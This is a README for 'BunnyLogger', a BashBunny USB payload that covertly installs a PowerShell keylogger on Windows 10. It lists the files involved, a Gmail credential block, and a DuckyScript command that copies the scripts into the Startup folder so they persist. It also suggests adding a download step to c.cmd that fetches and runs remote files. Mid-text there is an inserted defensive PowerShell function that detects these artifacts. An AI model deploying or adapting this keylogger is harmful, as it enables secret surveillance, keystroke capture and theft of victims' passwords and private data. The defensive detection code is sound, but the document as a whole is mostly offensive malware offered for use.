Chris Taylor [Blue Cosmo] | 08/24/21
A New Version of This Payload Is Available HERE
BunnyLogger is a BashBunny payload that uses PowerShell to log keystrokes
- moves c.cmd file to windows startup directory
- c.cmd will secretly run p.ps1
- p.ps1 will log keystrokes
- l.ps1 will email the logs every startup and every hour [via SMTP]
- sends logs hourly, regardless of system time
- Gmail account
- i suggest making a separate Gmail account for this payload
- your Gmail must have LSA Access enabled
- Windows 10 Target
Set-Up/Installation
- change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"
- in line 7 of duckyscript.txt, change 'switch1' to whatever switch you use
- in line 7 of duckyscript.txt, change 'BashBunny' to the name of your BashBunny
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
The c.cmd attack opportunity
the c.cmd file runs every startup. this means an attacker could place a 'wget' or 'Invoke-WebRequest' and have a file be downloaded from anywhere on the internet onto the computer. the file would then save in the startup directory, allowing it to run every startup
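The files named above leave a small, predictable footprint on disk, which is what a defender can look for. The following PowerShell triage check is an added example, not part of the original payload or written by its author: the function name, parameter names and the list of script extensions are assumptions, while the file names and locations (c.cmd in the per-user Startup folder; p.ps1, l.ps1 and a log named after the user in the temp directory) are taken from this README.

```powershell
# Added example (not from the payload): look for the on-disk artifacts the README describes.
# Function and parameter names are hypothetical; file names and folders come from the README.
function Find-BunnyLoggerArtifact {
    [CmdletBinding()]
    param(
        # Per-user Startup folder, where the README says c.cmd is copied.
        [string]$StartupDir = [Environment]::GetFolderPath('Startup'),
        # Temp directory, where the README says p.ps1, l.ps1 and <username>.log are placed.
        [string]$TempDir    = $env:TEMP,
        [string]$UserName   = $env:USERNAME
    )

    # 1. Script files in Startup run at every logon. Report each one together with
    #    any line that starts PowerShell or downloads content (wget / Invoke-WebRequest).
    $scriptExt = '.cmd', '.bat', '.ps1', '.vbs', '.js'   # assumed list of script types
    Get-ChildItem -LiteralPath $StartupDir -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $scriptExt -contains $_.Extension } |
        ForEach-Object {
            $hits = Select-String -LiteralPath $_.FullName `
                        -Pattern 'powershell|Invoke-WebRequest|wget' -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Path      = $_.FullName
                Reason    = 'Script file in Startup folder'
                Evidence  = ($hits.Line -join ' | ')
                LastWrite = $_.LastWriteTime
            }
        }

    # 2. The payload's two scripts and its per-user log file in the temp directory.
    foreach ($name in 'p.ps1', 'l.ps1', "$UserName.log") {
        $path = Join-Path $TempDir $name
        if (Test-Path -LiteralPath $path -PathType Leaf) {
            $item = Get-Item -LiteralPath $path -Force
            [pscustomobject]@{
                Path      = $item.FullName
                Reason    = 'File name used by the payload in temp directory'
                Evidence  = "$($item.Length) bytes"
                LastWrite = $item.LastWriteTime
            }
        }
    }
}

# Run against the current user's profile; no output means none of the artifacts were found.
Find-BunnyLoggerArtifact | Format-List
```

Generic names such as p.ps1 can belong to unrelated software, so treat a hit as a lead to review (file contents, LastWrite time, which account owns it) rather than as proof.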
- hope you enjoy the payload!!